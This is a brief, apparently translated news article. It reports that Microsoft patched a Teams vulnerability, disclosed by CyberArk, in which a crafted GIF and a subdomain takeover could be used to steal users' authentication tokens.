:strip_exif()/i/2002096979.jpeg?f=fpa)
Microsoft fixed a leak in video chat platform Teams that allowed attackers to take over all accounts in a subdomain by sending an infected .gif file. The leak was in both the desktop and web versions.
The leak was discovered by a security company CyberArk. The researchers discovered that Teams accounts could be acquired within a subdomain by generating an authentication token for that domain. A new temporary access token is generated every time Teams is opened. In addition, restrictions are imposed on who can log in via cookies. One of those cookies was forwarded to subdomains of teams.microsoft.com. CyberArk discovered that subdomain was vulnerable to a takeover.
The subdomain’s ability to inherit allowed attackers to steal authentication tokens if users were directed to the subdomain. This could be done, for example, by having them click on an infected link. However, the researchers also found a way to send a gif file that allowed the authentication token to be automatically generated and forwarded to the subdomain. Before that, users just had to view the poison. It was then possible to steal the token from any Teams user who viewed it.
The leak was in the web version and the desktop download of Teams. CyberArk reported the leak to Microsoft a month ago. The company has since repaired the vulnerability. According to Microsoft, there are no indications that the leak has been actively exploited.
–
